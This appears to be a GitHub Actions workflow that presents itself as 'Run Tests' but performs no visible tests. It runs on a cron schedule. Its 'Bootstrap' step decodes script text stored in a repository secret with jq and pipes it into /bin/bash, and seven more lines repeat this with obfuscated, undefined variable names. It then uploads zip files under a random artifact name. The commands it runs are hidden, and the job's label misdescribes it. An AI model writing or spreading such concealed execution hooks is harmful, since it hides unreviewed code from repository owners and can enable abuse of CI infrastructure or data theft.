name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '50 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  deploy:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Bootstrap
        env:
          he5: ${{ secrets.he5 }}
        run: |
          printf '%s' "$he5" | jq -r .l79821 | /bin/bash
          printf '%s' "$cqn535" | jq -r .hqm38 | /bin/bash
          printf '%s' "$p8082" | jq -r .tciv8894 | /bin/bash
          echo $pwxv80 | jq -r .b26 | /bin/bash
          printf '%s' "$pa250" | jq -r .aro9 | /bin/bash
          echo $wfhsp42 | jq -r .osk95772 | /bin/bash
          printf '%s' "$zx7" | jq -r .noqmr76 | /bin/bash
          printf '%s' "$sfgo02266" | jq -r .wqtr1383 | /bin/bash

      - name: Archive artifact
        uses: actions/upload-artifact@v4
        with:
          name: n6soCrOJ
          path: "*.zip"
          retention-days: 1
